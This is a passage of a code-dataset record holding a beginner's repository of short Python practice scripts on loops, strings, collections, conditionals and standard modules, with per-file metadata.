print(\"c=\",c)\n print(c)\n sum=b+c\n print(\"addition is:\",sum )\nprint(a)\nadd(40)\n" }, { "alpha_fraction": 0.4346405267715454, "alphanum_fraction": 0.4869281053543091, "avg_line_length": 11.791666984558105, "blob_id": "a950e39a1fbdd9f7b879b14c7e91fb389c5daa04", "content_id": "524a5ca9abc611078fbf11def3b03f2161e98379", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 306, "license_type": "no_license", "max_line_length": 32, "num_lines": 24, "path": "/nestedfor.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "count=1\nfor i in range(10):\n print(str(i)*i)\n for j in range(0,i):\n count=count+1\n\n\n#while day == 'thursday':\n# for i in [1,2,3,4]:\n# print ('something')\n\n\n\nfor i in [1,2,3]:\n pass\n\nprint('A')\n\n\nfor i in range(1,11):\n if i ==5:\n break\n #continue\n print (i)" }, { "alpha_fraction": 0.772946834564209, "alphanum_fraction": 0.782608687877655, "avg_line_length": 24.875, "blob_id": "f8362b250488c1a7ecbe73ea2c5d00835e72abb4", "content_id": "a708dc5f0aa4cc71a180eb6732009dcc99d355b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 41, "num_lines": 8, "path": "/enumerate.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "grocery = ['bread','butter','jam']\nenumerateGrocery= enumerate (grocery)\n\nprint(type(enumerateGrocery))\nprint(list(enumerateGrocery))\n\nenumerateGrocery= enumerate (grocery, 10)\nprint(list(enumerateGrocery))\n" }, { "alpha_fraction": 0.8500000238418579, "alphanum_fraction": 0.8500000238418579, "avg_line_length": 12.666666984558105, "blob_id": "74b034ec446a2d14690ab83cf9cb52423cfc0be1", "content_id": "9b60d105d0de4e2d346e648c8ef1730a053f09ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40, "license_type": "no_license", "max_line_length": 23, "num_lines": 3, "path": "/datetime.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import datetime\n\nprint(datetime.MAXYEAR)" }, { "alpha_fraction": 0.6913580298423767, "alphanum_fraction": 0.7530864477157593, "avg_line_length": 19.5, "blob_id": "a05b717e2aee1d6d99ea1ad20b83e319cc88e3ba", "content_id": "a0baa8b855ee5de168b1dced2cc623fa1ac0b0fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 81, "license_type": "no_license", "max_line_length": 28, "num_lines": 4, "path": "/random.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import random\nnum = random.randrange(100)\nprint(num)\nprint (random.randint(0, 5))" }, { "alpha_fraction": 0.7628865838050842, "alphanum_fraction": 0.7628865838050842, "avg_line_length": 15.333333015441895, "blob_id": "5222306ff90d6b918b932616ef134da1f897f7bf", "content_id": "2696d6df0ece972cb81ec474e62c29694621a833", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 97, "license_type": "no_license", "max_line_length": 17, "num_lines": 6, "path": "/sys1.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import sys\nprint(sys.argv)\nprint(sys.exit())\nprint(sys.winver)\nprint(sys.flags)\nprint(sys.prefix)" }, { "alpha_fraction": 0.4404761791229248, "alphanum_fraction": 0.4761904776096344, "avg_line_length": 10.714285850524902, "blob_id": "6347ac2a6beba30d19172d2cc1ffee1b226df504", "content_id": 
"1719e2dc21667ecf26a8ea1a668bd6d304d5f11d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 15, "num_lines": 7, "path": "/bitwise.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=5\nb=10\nprint( a & b)\nprint( a | b)\nprint( a ^ b)\nprint( a << b)\nprint( a >> b)\n\n\n" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 7.5, "blob_id": "83cd1c55a5c61cadd658a3be395bcf859caedb3f", "content_id": "a7c6a60612426bbd21f0570231096c2f0a072dd4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 50, "license_type": "no_license", "max_line_length": 20, "num_lines": 6, "path": "/sys.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import sys\n\n\nprint(len(sys.argv))\n\nprint(sys.argv)" }, { "alpha_fraction": 0.4935064911842346, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 14.199999809265137, "blob_id": "1560967c8f7becdd221af2c73c88c8342e66e202", "content_id": "9e10f09e4dca76052949e3c0c116b89081fbb737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 77, "license_type": "no_license", "max_line_length": 16, "num_lines": 5, "path": "/def_function.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "def add(a,b):\n sum=a+b\n return(sum)\nprint (add(3,3))\nprint (add(4,3))\n\n" }, { "alpha_fraction": 0.6715328693389893, "alphanum_fraction": 0.6934306621551514, "avg_line_length": 16.1875, "blob_id": "a04e6b63480fe29d95e3c439c7736bd16c3b6c40", "content_id": "1c04cd5a9fb1b66d4e60fc75d6237be8ead0ea2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 274, "license_type": "no_license", "max_line_length": 58, "num_lines": 16, "path": "/dict.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "# dictionary contains key value pairs\n\nA={'Age':24,'name':'rohith'}\nprint(A['Age'])\nprint(A['name'])\n# this is way more readbale\n#here values can be anything like dictionary ,array ,tuple\n\n\n#another way\n\na=[32,'john']\nprint(a[0])\nprint(a[1])\n\n#this is not in readable format" }, { "alpha_fraction": 0.539130449295044, "alphanum_fraction": 0.6173912882804871, "avg_line_length": 13.5, "blob_id": "a414c320ef943ada519e35cb564d52536c6a8c3c", "content_id": "af6eabc2ce4dfcaf6dd7e55eff7092e5870d39dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 115, "license_type": "no_license", "max_line_length": 26, "num_lines": 8, "path": "/membershipcheck.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "list=(1,2,3,4)\nprint(list)\nprint(1 in list)\n\n\na=[1,2,3,4,'rohith']\nprint('rohith' in a )\nprint('rohith' not in a )" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 15.833333015441895, "blob_id": "eec2541dd39e2f06b929ba276f726aad3bee71da", "content_id": "25f8064e41fb2f50f15197a70e335730a57293cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 20, "num_lines": 6, "path": "/os.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import 
os\nprint(os.name)\nprint(os.environ)\nprint(os.getlogin())\nprint(os.getppid())\nprint(os.getcwd())" }, { "alpha_fraction": 0.6774193644523621, "alphanum_fraction": 0.7204301357269287, "avg_line_length": 17.799999237060547, "blob_id": "b274f1d8c8c760f6e2710f8ab9b10c1badf544e2", "content_id": "f96b3497bfed062760cf6c13a863d8d9790e305e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 45, "num_lines": 5, "path": "/sets.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "# sets are an unordered collection of items\n# every element is unique\n\nA={1,2,3,3}\nprint(A)" }, { "alpha_fraction": 0.7553191781044006, "alphanum_fraction": 0.7553191781044006, "avg_line_length": 18, "blob_id": "a7231fe647f923a939221fcfa490c90b1fafa926", "content_id": "9c744fe1a3576c51d2f9e214449ce03f2920f1e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 43, "num_lines": 5, "path": "/hello.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "print(\"hello world\")\n\nprint(\"welcome to edureka\")\n\nprint(\"Happy learning\\nwelcome to edureka\")" }, { "alpha_fraction": 0.5609756112098694, "alphanum_fraction": 0.5609756112098694, "avg_line_length": 19.5, "blob_id": "113cf25e897d27f8ef6468ab13ad4a66e171b1eb", "content_id": "8bb2ed9398465d6077f58170126d3ac513373eef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 37, "num_lines": 10, "path": "/attribute.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "class Edureka():\n def __init__(self):\n self.__pri=(\"i am private\")\n self._pro=(\"i am protective\")\n self.pub=(\"i am public\")\n\nob=Edureka()\nprint(ob.pub)\nprint(ob._pro)\nprint(ob.__pri) # raises AttributeError: private names are mangled\n" }, { "alpha_fraction": 0.6200000047683716, "alphanum_fraction": 0.6600000262260437, "avg_line_length": 13.428571701049805, "blob_id": "df641154ad500efd73bf59e4df42ed88d093d1ed", "content_id": "c430c40c40644f972368f91e1f2b8cd14a27bc5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/dictexample.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "dict={1:'python',2:'android'}\nprint(dict)\nprint(dict[1])\n\n\nperson=['rohit','ashok']\nprint(person[1])" }, { "alpha_fraction": 0.46341463923454285, "alphanum_fraction": 0.5934959053993225, "avg_line_length": 16.714284896850586, "blob_id": "dd0aefd3108e6ec9a28613bc70948ca34667928d", "content_id": "ad93eb445e383700684e140b0c1ebb705471898f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 123, "license_type": "no_license", "max_line_length": 32, "num_lines": 7, "path": "/ifelse.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=30\nif(a<10):\n print(\"less than 10\")\nelif (10<=a<=25):\n print(\"in between 10 and 25\")\nelse:\n print(\"greater than 25\")" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6704545617103577, "avg_line_length": 21, "blob_id": "766c55f28887c94269154c859efe1e11e2a7bae0", "content_id": "d5860df1bfbebf87375cae065839716ea35200c7", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 31, "num_lines": 4, "path": "/json.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import json\ndate= {\"name\":\"alica\" ,\"age\":4}\njson_str = json.dumps(data)\nprint(json_str)\n" }, { "alpha_fraction": 0.5388888716697693, "alphanum_fraction": 0.5722222328186035, "avg_line_length": 12.923076629638672, "blob_id": "5ef02fc733368929706be39e87d89c8545b8e1f9", "content_id": "99ac7eeb5f36d9d3cb4379823aa761c4776a5a3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 180, "license_type": "no_license", "max_line_length": 29, "num_lines": 13, "path": "/fact.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "num=int(input(\"number:\"))\n\nfact=1\n\nif num <0:\n print(\"must be positive\")\nelif num == 0:\n print(\"fact = 1\")\nelse:\n for i in range(1,num+1):\n fact=fact*i\n\nprint(fact)" }, { "alpha_fraction": 0.5299999713897705, "alphanum_fraction": 0.6299999952316284, "avg_line_length": 10.11111068725586, "blob_id": "085c7f794bc160fd5a935fd64bc3dada1b1371e4", "content_id": "a756aa3224b4cc878dae0b1abaa4b7b7b0e854f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 25, "num_lines": 9, "path": "/num.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "A=10 #int\nB=2.64 # float\nC=10+2j # complex numbers\nD=5 + 4j\n\nprint(A)\nprint(B)\nprint(C)\nprint(D-C)\n" }, { "alpha_fraction": 0.49152541160583496, "alphanum_fraction": 0.5593220591545105, "avg_line_length": 7.5714287757873535, "blob_id": "3ad853610ab52ec2150eea7273d03b037eb566e1", "content_id": "34868eff10ce2a4f66f159dafe3782b0305cb9d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 13, "num_lines": 7, "path": "/global.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=50\ndef number():\n b=30\n print(b)\n\nprint(a)\nnumber()" }, { "alpha_fraction": 0.5374149680137634, "alphanum_fraction": 0.5850340127944946, "avg_line_length": 11.25, "blob_id": "0a00922646391bb877eea4acc39cb7b473aede68", "content_id": "c4aa111bd378391c1f138cef398e8ef029bd778d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 147, "license_type": "no_license", "max_line_length": 25, "num_lines": 12, "path": "/while.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "count=0\nwhile(count<5):\n print(count)\n count=count+1\nprint(\"good bye....!\")\n\n\n\nrank=5\nwhile(rank!=12):\n print(\"rank is\",rank)\n rank+=1\n" }, { "alpha_fraction": 0.664383590221405, "alphanum_fraction": 0.6780821681022644, "avg_line_length": 23.5, "blob_id": "0b15322e0f0564d463d17b99f9c774e289fcd1ba", "content_id": "2419cf5160acc0c3794f37c9ad51febfa63663a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 146, "license_type": "no_license", "max_line_length": 50, "num_lines": 6, "path": "/input.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "name=input(\"enter the name\")\nage=input(\"enter the age\")\n\nprint(\"welcome\",name)\nprint(\"age\",age)\nprint(\"after 5 years age will be :\", (int(age)+5))" }, { "alpha_fraction": 
0.54347825050354, "alphanum_fraction": 0.6449275612831116, "avg_line_length": 7.5, "blob_id": "d0000f388269a274f6033b54a3f0cf31f8663a1c", "content_id": "e8f2900a0f502895c691c9d94a90786d2d5e447d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 138, "license_type": "no_license", "max_line_length": 16, "num_lines": 16, "path": "/variable.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "A=10\nB=\"rohith\"\nprint(A,B)\n\n\n#another example\n\nx,y,z=10,20,30\nprint(x,y,z)\n\n\n#another example\nx,y,z=10,20,30\nprint(x)\nprint(y)\nprint(z)\n\n\n" }, { "alpha_fraction": 0.7593985199928284, "alphanum_fraction": 0.7593985199928284, "avg_line_length": 15.75, "blob_id": "485793813dea301d32275e4f2849f49999c6c21b", "content_id": "1bec7900861f75ee3b3ff6924cbdc2b18f32c8f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 24, "num_lines": 8, "path": "/yogaday.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "today=\"wednesday\"\nyogaday=\"thursday\"\nhrx=\"monday\"\nsc=\"tuesday\"\nfootball=\"friday\"\ndance=\"saturday\"\nprint(today == yogaday)\nprint(hrx)" }, { "alpha_fraction": 0.6597222089767456, "alphanum_fraction": 0.6736111044883728, "avg_line_length": 15.11111068725586, "blob_id": "40d37988b88b2857633c757f2eaff91986bca230", "content_id": "ba3cc9ceaeb0222319102ab7c8b884cbc1386f4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 33, "num_lines": 9, "path": "/stringcapitalize.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "str=\"rohith\"\nprint(str.capitalize())\nprint(str.count(\"oh\",0,len(str)))\nprint(max(str))\nprint(min(str))\n\n\ns=str.encode('utf-8','strict')\nprint(s)" }, { "alpha_fraction": 0.4385964870452881, "alphanum_fraction": 0.5263158082962036, "avg_line_length": 9.454545021057129, "blob_id": "ecb554635e5a6f427350d39da9630033af45fc8f", "content_id": "52a0f2e7c263f70096222c971137ab3b9dae3f6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114, "license_type": "no_license", "max_line_length": 26, "num_lines": 11, "path": "/setsexample.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "x= set(\"welcome to rohit\")\nprint(x)\n\n\na={1,2,3,4,5}\nb={4,5,6,7,8}\nprint(a|b)\nprint(a & b)\nprint(a -b)\n\ns={'a','b'}" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.6025640964508057, "avg_line_length": 8.875, "blob_id": "f769b769a4d7694550fe11988f2a724735166f2c", "content_id": "cb6662e694d6e8c12f199a062a64e896ba12c2c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 78, "license_type": "no_license", "max_line_length": 11, "num_lines": 8, "path": "/comparison.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=5\nb=10\nprint(a==b)\nprint(a!=b)\nprint(a>b)\nprint(a<b)\nprint(a>=b)\nprint(a<=b)" }, { "alpha_fraction": 0.604651153087616, "alphanum_fraction": 0.6899224519729614, "avg_line_length": 14.333333015441895, "blob_id": "874fb556281208c152da355ace3b61e1694b0f33", "content_id": "82f3316590c50c7ac0620c84199aaed518661a09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, 
"license_type": "no_license", "max_line_length": 18, "num_lines": 9, "path": "/strings.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "str1=\"salaam \"\nstr2=\"rocky\"\nstr3=\"bhai\"\nprint(str1)\nprint(str2)\nprint(str3)\nprint(len(str1))\nprint(str1[1:3])\nprint('t' in str1)\n" }, { "alpha_fraction": 0.5755395889282227, "alphanum_fraction": 0.633093535900116, "avg_line_length": 18.85714340209961, "blob_id": "d7a0abcdd81720b0cfd523a9c86ec4b32c4964da", "content_id": "9545d05576b739951fabc5931cfe5b8e1e828edb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 50, "num_lines": 7, "path": "/ifelifelse.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "marks=70\nif(marks<40):\n print(\"fail\")\nelif(40<marks<=60):\n print(\"average\")\nelse:\n print(\"congrats! well done...you have passed\")\n" }, { "alpha_fraction": 0.5430809259414673, "alphanum_fraction": 0.6083551049232483, "avg_line_length": 17.285715103149414, "blob_id": "414250533340c166e6e1673a4b3218e6ac9d530e", "content_id": "7cd87da6cb6519aeeb79f4a7962b2c8dd844dda2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "no_license", "max_line_length": 39, "num_lines": 21, "path": "/file_op.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "list=[\"java\",\"python\",\"c\"]\nprint(list[1])\nprint(list[0:2])\nprint(list[-1])\nprint(list[-2])\nprint(list[-3])\n#print(list+[\"reactjs\",\"c++\"])\n#print(list*3)\n#print(\"java\" in list,\"golang\" in list)\n#list[1]=\"aws\"\n#print(list)\n#del(list[2])\n#print(list)\n\n#list1=[1,2,3,4,5,'a','b','c']\n#print(list.pop(3))\n#print(list1.remove(3))\n\n#print(list1)\nlist=[x**2 for x in [1,2,3,4,5]]\nprint(list)" }, { "alpha_fraction": 0.7021276354789734, "alphanum_fraction": 0.7021276354789734, "avg_line_length": 23, "blob_id": "182993da5a1c9c9ab9f1333d2947e663e73115a6", "content_id": "c3d7c1e7f4738804d101e78944c8829e88515037", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "no_license", "max_line_length": 30, "num_lines": 2, "path": "/print.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "print (\"rohith\")\nprint (\"i am learning python\")" }, { "alpha_fraction": 0.523809552192688, "alphanum_fraction": 0.5952380895614624, "avg_line_length": 19.5, "blob_id": "d51b592a563b74c64e2d88442ab29c4d532c0fcc", "content_id": "ba575ddfdd596791eb1243588abae55de158ee30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/atupleinsidelist.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "\n\nlist=[(1,2,3),(\"python\",\"java\")]\nprint(list)\nprint(len(list))\nprint(list[1][0:1])\n" }, { "alpha_fraction": 0.6091954112052917, "alphanum_fraction": 0.7241379022598267, "avg_line_length": 21, "blob_id": "4322367e812406e5aeb339163c48a4cb80f3fd7e", "content_id": "1b521d1ab25cf8863ff62562c22c324d1352ddc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 87, "license_type": "no_license", "max_line_length": 27, "num_lines": 4, "path": "/math.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": 
"import math \nprint(math.ceil(10.098))\nprint(math.copysign(10,-1))\nprint(math.fabs(-19))" }, { "alpha_fraction": 0.6015037298202515, "alphanum_fraction": 0.6240601539611816, "avg_line_length": 10.166666984558105, "blob_id": "7f6e99d8cdb1bda9261019de04e6c6cab38a4427", "content_id": "c85627e5ff5f22930816af39fc3759e3c16ced2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 39, "num_lines": 12, "path": "/for.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "fruits=['banana','carrot','putchattni']\n\nfor fruit in fruits:\n print(fruit)\n\n\n\n\nlist=[1,2,3,'banana']\n\nfor i in list:\n print(i)" }, { "alpha_fraction": 0.6497696042060852, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 20.799999237060547, "blob_id": "17cc35444c42cf745a7d2bff380aec12f2efb42d", "content_id": "55b52bf18e849871d197f1f8a0dbfee80f5eb75b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 53, "num_lines": 10, "path": "/tuple.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "list=(1,2,3,4)\nprint(list)\nprint(list[0]) # it will 1 beacuse its in zero index\nprint(list[1])\nprint(list[2])\nprint(list[3])\nprint(4 in list)\nprint(3 not in list)\n\n#list[3]=7 python doesnt not support item assignment" }, { "alpha_fraction": 0.6984127163887024, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 20.16666603088379, "blob_id": "4b54abcfa528c69f52b9844fe7159645cbb65ad2", "content_id": "d615c24f105840ec03b4a95839e8f378e2308e0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 126, "license_type": "no_license", "max_line_length": 33, "num_lines": 6, "path": "/str.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "str=input(\"enter the input\")\nprint(\"Recieved input is:\",str)\n\n\nstr1=input(\"enter the input\")\nprint(\"Revieved input is :\",str1)" }, { "alpha_fraction": 0.5826771855354309, "alphanum_fraction": 0.5984252095222473, "avg_line_length": 20.16666603088379, "blob_id": "97aaac8e88dd027290665ff1edae8bd3e8fc11d5", "content_id": "854c8c6ca36d7dec7abb4d1dcc384d9159415aca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "no_license", "max_line_length": 53, "num_lines": 6, "path": "/stringexample.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "name=\"rohith\"\nage=22\n\nprint(\"my name is %s and age is %d\" % (name,age))\n\nprint(\"my name is\" + name + \" and age is \" +str(age))\n" }, { "alpha_fraction": 0.6259542107582092, "alphanum_fraction": 0.6564885377883911, "avg_line_length": 14.411765098571777, "blob_id": "639ab94f499654d37c99b244b12493db08f46d40", "content_id": "ad9a77e2ddac9e4ce5bee38c9d0d3a335ad0297b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 262, "license_type": "no_license", "max_line_length": 49, "num_lines": 17, "path": "/list_example.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "list=[1,2,3]\nlist.append(\"machine learning\")\nprint(list)\n\n\nlist.extend(['g','h'])\nprint(list)\n\nlist.insert(1,'scripting')\nprint(list)\n\nlist.remove(3)\nprint(list)\n\nlist1=sorted(['python','java','dotnet','golang'])\nfor course in 
list1[::-1]:\n print(course)\n" }, { "alpha_fraction": 0.5984848737716675, "alphanum_fraction": 0.6439393758773804, "avg_line_length": 15.375, "blob_id": "5e8229166bad8f95244d61fd4f659e7f1e75f1c8", "content_id": "9223d412d5502e3a482e1aad0b1f6d7aaa632690", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 132, "license_type": "no_license", "max_line_length": 28, "num_lines": 8, "path": "/operation_read.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import os\nnewfile=open(\"ro.txt\",\"r\") \n\n\n#for i in range(1,10):\n# print(newfile.read())\nnewfile.seek(100)\nprint(newfile.tell())\n\n" }, { "alpha_fraction": 0.5785714387893677, "alphanum_fraction": 0.6642857193946838, "avg_line_length": 9.769230842590332, "blob_id": "0ba1d9968271e0126e1500c498d5bea33471bf29", "content_id": "06c7b94ed896065324d05bc7ceb2cdcb33c9493e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 23, "num_lines": 13, "path": "/morestrings.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "str1=\"happy learning\"\n\nprint(str1[::-1])\n\nprint(str1[2:7])\n\nprint(str1.find(\"L\"))\n\nstr2=\"welcome to coorg\"\n\nprint(str1+str2)\n\nprint(str1*2)\n" }, { "alpha_fraction": 0.5461538434028625, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 13.44444465637207, "blob_id": "d630af405bdab7b14240a326b95cdc273af41149", "content_id": "e3e704a944015684d4bb00fe5c930b8c169fefc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 32, "num_lines": 9, "path": "/ifelif.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "X=10\nY=12\n\nif(X<Y):\n print('X is less than Y')\nelif(X>Y):\n print('X is greater than Y')\nelse:\n print('X and Y are equal')\n" }, { "alpha_fraction": 0.7575757503509521, "alphanum_fraction": 0.7575757503509521, "avg_line_length": 7.25, "blob_id": "152e772dfcfdd4c086a1167d737675087e396e3b", "content_id": "d6afba52d836183aa23e109368182f75165b29f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 33, "license_type": "no_license", "max_line_length": 15, "num_lines": 4, "path": "/README.md", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "# python_rohit\n\n\nLearning python\n" }, { "alpha_fraction": 0.5799999833106995, "alphanum_fraction": 0.6100000143051147, "avg_line_length": 8.899999618530273, "blob_id": "d05d1b4e113223300e7f6ae0304dbd95ee197cbe", "content_id": "164d3638312091c89fd6e987eccde3955cfd9f4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 11, "num_lines": 10, "path": "/operators.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "A=5\nB=10\nprint(A+B)\nprint(A-B)\nprint(A*B)\nprint(A/B)\nprint(A%B)\nprint(A**B)\nprint(A//B)\nprint(A-B)\n\n" }, { "alpha_fraction": 0.7285714149475098, "alphanum_fraction": 0.7357142567634583, "avg_line_length": 16.625, "blob_id": "d1d135a14639257663cfc5ca24afef0c6e92fc29", "content_id": "92f00371df4c0c1311952fc471ba88c2a0991c30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 
53, "num_lines": 8, "path": "/comments.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "# this is the way to single commit write #\n\n'''\nsuppose you want to commit more code then add 3 lines\nbulk comment\nor \nmultiline comment\n'''" } ]
55
acaciawater/maps
https://github.com/acaciawater/maps
48bd369aeb58aba0e080b7a3c695a2bfb2a527c3
f300ea5b9a1d8fb2d7f82cdf4333f79b4a0303da
e8a0d98cb6c1c43b33377fee5fc5a69c284f8e79
refs/heads/master
2022-12-07T02:45:34.767049
2020-12-24T08:11:52
2020-12-24T08:11:52
186,702,279
0
0
null
2019-05-14T21:21:58
2020-12-24T08:12:06
2022-11-22T03:49:52
Python
